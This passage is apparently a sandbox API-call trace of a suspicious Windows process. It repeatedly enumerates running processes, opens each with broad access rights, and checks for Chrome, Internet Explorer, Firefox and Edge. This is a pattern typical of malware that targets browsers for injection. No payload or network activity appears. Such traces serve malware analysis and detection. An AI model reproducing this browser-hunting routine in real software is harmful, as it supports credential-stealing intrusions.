	[0240.993] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.993] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.994] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.994] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0240.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x84b0
	[0240.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.995] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0240.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.996] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.996] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0240.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.996] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.997] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x84b4
	[0240.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.997] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.998] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.998] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.999] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x84b8
	[0241.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.000] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.001] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.001] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.001] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x84bc
	[0241.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.003] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.003] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.004] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.004] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.004] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x84c0
	[0241.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.006] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.006] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.006] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.007] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x84c4
	[0241.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.008] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.008] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.009] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.009] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x84c8
	[0241.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.010] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.010] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.011] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.011] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0241.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x84cc
	[0241.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.012] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0241.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.012] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.013] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0241.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.013] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0241.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x84d0
	[0241.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.014] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.014] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.015] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.015] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0241.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x84d4
	[0241.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.016] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0241.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.017] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.017] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0241.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.017] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.017] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x84d8
	[0241.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.018] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.019] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.019] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.019] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.019] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0241.020] CloseHandle (hObject=0x4fd0) returned 1
	[0241.020] Sleep (dwMilliseconds=0x64) 
	[0241.115] GetCurrentProcessId () returned 0x110
	[0241.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0241.118] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0241.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0241.120] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0241.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x84dc
	[0241.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.121] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.121] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.122] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.122] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.123] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x84e0
	[0241.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.124] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.124] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.124] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.125] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.125] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0241.126] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x84e4
	[0241.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.126] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0241.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.127] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.127] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0241.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.128] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x84e8
	[0241.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.129] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.130] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.130] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.131] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.131] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0241.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x84ec
	[0241.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.132] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0241.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.133] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.133] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0241.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.134] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.134] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0241.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x84f0
	[0241.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.135] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0241.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.135] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.136] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0241.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.136] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0241.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x84f4
	[0241.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.138] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0241.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.138] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.139] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0241.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.139] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.139] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0241.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x84f8
	[0241.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.140] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.141] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.141] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.141] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x84fc
	[0241.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.143] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.143] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.144] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.144] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.145] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8500
	[0241.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.146] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.147] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.147] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.147] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.148] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8504
	[0241.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.149] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.150] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.151] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.152] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.152] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8508
	[0241.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.155] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.156] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.157] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.158] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
